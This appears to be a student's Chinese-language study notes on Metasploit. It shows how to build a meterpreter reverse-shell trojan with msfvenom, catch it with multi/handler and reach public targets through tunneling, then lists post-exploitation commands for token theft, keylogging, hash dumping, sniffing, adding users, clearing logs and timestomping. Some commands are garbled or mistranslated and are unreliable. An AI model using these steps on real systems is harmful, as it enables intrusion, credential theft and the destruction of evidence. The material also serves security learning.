文章目录前言一、入侵步骤ps后,通过学习了解了内网透明二、MSF控制台常用命令的总结
前言metasploit框架是一个非常好的开源渗透测试框架。
Metasploit渗透测试框架(MSF3.4 )包括三个功能模块: MSF控制台、msfweb和MSF更新。 msfupdate用于软件更新。 建议在使用前更新,以便可以更新最新的漏洞库和使用代码。 MSF控制台是整个框架中最受欢迎的模块,也是个人最强大的模块,所有功能都可以在该模块下运行。 msfweb是Metasploit框架的web组件,支持多用户,是Metasploit图形界面。
一、入侵步骤先生成了木马
MSF venom-p windows/meter preter/reverse _ tcpl host=lport=-fexe-o.exe
然后进入MSF控制台
使用他的监听模块
use exploit/multi/handler设置payload
setpayloadwindows/meter preter/reverse _ TCP设置的监听端口和ip与以前生成的木马相匹配
然后拦截端口,木马文件运行后控制这台计算机
然后,可以获取目标shell
ps后,通过学习得知内网透明很容易实现内网透明,进行了公共网络攻击
与内部网不同,生成的木马现在使用服务器端口和ip地址。 监听端口是服务器端口,监听ip是本地计算机127.0.0.1
其他和内部网攻击一样
二、MSF控制台常用命令: show exploit列出metasploit框架中的所有渗透攻击模块。
命令: show payloads列出metasploit框架中的所有攻击载荷。
命令: show auxiliary列出metasploit框架中的所有辅助攻击载荷。
命令: search name搜索metasploit框架中的所有渗透攻击和其他模块。
命令: info提供有关渗透攻击或模块创建的信息。
命令: use name加载渗透攻击或模块。
命令: LHOST本地可以连接目标主机的IP地址。 通常,如果目标主机不在同一LAN中,则它必须是公共IP地址。 特别是在反弹壳中使用。
命令: RHOST远程主机或目标主机。
命令:设置特定的配置参数(EG :设置本地或远程主机参数)。
命令: setg function全局设置特定的配置参数。 (EG )设置本地或远程主机参数。
命令: show options列出渗透攻击或模块中的所有配置参数。
命令: show targets列出渗透攻击支持的所有目标平台。
命令: set target num指定已知的目标操作系统和修补程序版本类型。
命令:设置支付名称指定要使用的攻击载荷。
命令:显示高级列出了所有高级配置选项。
命令: set autorunscript migrate -f .在渗透攻击完成后自动转移到其他进程。
命令: check有相应的安全漏洞来检测目标是否选择了渗透攻击。
命令: exploit通过执行渗透攻击或模块来攻击目标。
命令: exploit -j在计划的任务下进行渗透攻击(攻击在后台进行)。
命令: exploit -z渗透攻击完成后,不与回复交互
帮助
打开元数据的帮助。
run脚本name
运行meterpreter脚本,在scripts/meterpreter目录中显示所有脚本名称。
sysinfo
列出被管理主机的系统信息。
ls
列出目标主机上的文件和文件夹信息。
美国大奖赛
加载特权升级扩展模块以扩展metasploit库。
ps
显示所有正在运行的进程和相关的用户帐户。
迁移PID
转移到指定的进程id。 可以通过ps命令从主机获取PID编号。
用户信息
加载incognito功能(用于窃取目标主机的令牌或假用户)。
list_tokens -u
列出目标主机用户的可用令牌。
list_tokens -g
列出目标主机用户组中可用的令牌。
impersonate _ token domain _ name _ username
欺骗目标主机上可用的令牌。
steal_token PID
窃取指定进程的可用令牌并进行令牌伪装。
drop_token
停止伪造现在的令牌。
获取系统
通过各种攻击向量提高系统用户的权限。
执行- f
cmd.exe -i执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。
reg command
在目标主机注册表中进行交互,创建,删除,查询等操作。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。
screenshot
对目标主机的屏幕进行截图。
upload file
向目标主机上传文件。
download file
从目标主机下载文件。
keyscan_start
针对远程目标主机开启键盘记录功能。
keyscan_dump
存储目标主机上捕获的键盘记录。
keyscan_stop
停止针对目标主机的键盘记录。
getprivs
尽可能多的获取目标主机上的特权。
uictl enable keyboard/mouse
接管目标主机的键盘和鼠标。
background
将你当前的metasploit shell转为后台执行。
hashdump
导出目标主机中的口令哈希值。
use sniffer
加载嗅探模式。
sniffer_interfaces
列出目标主机所有开放的网络端口。
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探。
sniffer_start interfaceID packet-buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探。
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据。
sniffer_stop interfaceID
停止嗅探。
add_user username password -h ip
在远程目标主机上添加一个用户。
clearev
清楚目标主机上的日志记录。
timestomp
修改文件属性,例如修改文件的创建时间(反取证调查)。
reboot
重启目标主机。
总结msfconsole在上学期暑期集训时就有所接触了解,现在重新推到重新来过了一遍,感觉自己相比以前对那些命令渐渐不再陌生,懂得了一些命令的含义。
这种攻击方法依然是依赖于同一局域网的存在,在相同网段下可以获取别人电脑的权限。
不过今天通过一些资料了解到通过内网穿透好像是可以实现公网之间的渗透。